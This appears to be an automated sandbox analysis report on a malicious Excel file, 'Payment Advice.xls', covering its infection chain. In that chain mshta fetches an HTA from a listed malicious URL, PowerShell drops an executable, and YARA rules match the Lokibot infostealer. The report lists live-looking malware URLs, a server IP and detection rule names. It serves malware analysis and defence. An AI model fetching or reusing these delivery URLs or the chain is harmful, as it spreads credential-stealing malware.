                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.n?
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: powershell.exe, 00000005.00000002.454706317.0000000003632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: powershell.exe, 00000005.00000002.454706317.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.470705091.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.0000000002181000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: rrwscqkDSNwLK.exe, 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5W
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/
                    Source: mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/:
                    Source: mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, CA430000.0.drString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
                    Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k
                    Source: mshta.exe, 00000004.00000002.431523218.000000000049A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k
                    Source: mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2
                    Source: mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
                    Source: mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket
                    Source: mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc
                    Source: mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/J
                    Source: mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/~
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49180 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Payment Advice.xlsOLE: Microsoft Excel 2007+
                    Source: ~DF6CCF4596F2406470.TMP.0.drOLE: Microsoft Excel 2007+
                    Source: CA430000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].htaJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\caspol.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE892700DD5_2_000007FE892700DD
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_003804C011_2_003804C0
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038280811_2_00382808
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038108F11_2_0038108F
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_003810DC11_2_003810DC
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038C17811_2_0038C178
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038C5B011_2_0038C5B0
